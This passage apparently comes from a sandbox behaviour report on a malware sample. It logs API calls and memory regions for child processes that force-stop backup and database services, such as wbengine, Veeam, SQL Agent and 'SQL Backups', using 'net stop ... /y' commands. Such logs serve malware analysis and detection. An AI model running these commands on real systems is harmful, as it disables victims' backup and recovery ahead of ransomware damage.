[0120.218] OpenServiceW (hSCManager=0x31cdf0, lpServiceName="WBENGINE", dwDesiredAccess=0xc) returned 0x31ce50 [0120.218] QueryServiceStatus (in: hService=0x31ce50, lpServiceStatus=0x20fbf0 | out: lpServiceStatus=0x20fbf0*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0120.219] GetServiceDisplayNameW (in: hSCManager=0x31cdf0, lpServiceName="WBENGINE", lpDisplayName=0xff8a5350, lpcchBuffer=0x20fbc8 | out: lpDisplayName="Block Level Backup Engine Service", lpcchBuffer=0x20fbc8) returned 1 [0120.219] NetApiBufferFree (Buffer=0x320c70) returned 0x0 [0120.219] CloseServiceHandle (hSCObject=0x31ce50) returned 1 [0120.219] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.219] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0120.231] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The Block Level Backup Engine Service service is not started.\r\n") returned 0x3f [0120.232] GetFileType (hFile=0xb) returned 0x2 [0120.233] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fae8 | out: lpMode=0x20fae8) returned 1 [0120.233] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x20fae0, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x20fae0*=0x3f) returned 1 [0120.233] GetFileType (hFile=0xb) returned 0x2 [0120.233] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fae8 | out: lpMode=0x20fae8) returned 1 [0120.234] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fae0, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x20fae0*=0x2) returned 1 [0120.234] _ultow (in: _Dest=0xdc1, _Radix=2161488 | out: _Dest=0xdc1) returned="3521" [0120.234] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0120.234] GetFileType (hFile=0xb) returned 0x2 [0120.234] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fae8 | out: lpMode=0x20fae8) returned 1 [0120.234] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fae0, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x20fae0*=0x34) returned 1 [0120.234] GetFileType (hFile=0xb) returned 0x2 [0120.235] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fae8 | out: lpMode=0x20fae8) returned 1 [0120.235] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fae0, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x20fae0*=0x2) returned 1 [0120.235] NetApiBufferFree (Buffer=0x314d40) returned 0x0 [0120.235] NetApiBufferFree (Buffer=0x31c0e0) returned 0x0 [0120.235] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0120.235] exit (_Code=2) Process: id = "364" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7784b000" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12780 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12781 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 12782 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 12783 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12784 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12785 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12786 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12787 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12788 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12789 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12790 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12791 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12792 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12793 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12794 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 12795 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12796 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12797 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12798 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 903 os_tid = 0xc48 Process: id = "365" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0xb26b000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop swi_update /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12800 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12801 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12802 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12803 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 12804 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12805 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12806 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12807 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12808 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12809 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12810 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12811 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12812 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12813 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12814 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 12815 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12816 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12817 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12818 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12877 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12878 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12879 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 12880 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12881 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 12882 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 12883 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 12884 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12885 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12886 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12887 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12888 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12889 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12890 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12891 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12892 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 905 os_tid = 0x6c8 Process: id = "366" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x3b8b000" os_pid = "0xa78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$CXDB /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12839 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12840 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12841 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12842 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12843 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12844 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12845 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12846 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12847 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12848 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12849 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 12850 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12851 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12852 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12853 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12854 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12855 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12856 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12857 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 907 os_tid = 0xb80 Process: id = "367" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1d1ab000" os_pid = "0x13f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$CITRIX_METAFRAME /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12858 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12859 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12860 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12861 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 12862 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12863 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12864 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12865 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12866 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12867 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12868 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 12869 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12870 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12871 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12872 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 12873 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12874 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12875 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12876 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 909 os_tid = 0xe1c Process: id = "368" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0xa9ca000" os_pid = "0x13fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"SQL Backups\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12893 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12894 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12895 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12896 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12897 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12898 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12899 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12900 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12901 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12902 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12903 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12904 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12918 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12919 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 12920 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12921 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12922 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12923 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 911 os_tid = 0x13f8 Process: id = "369" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7ab19000" os_pid = "0x474" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "365" os_parent_pid = "0xbec" cmd_line = "C:\\Windows\\system32\\net1 stop swi_update /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12905 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12906 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12907 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = 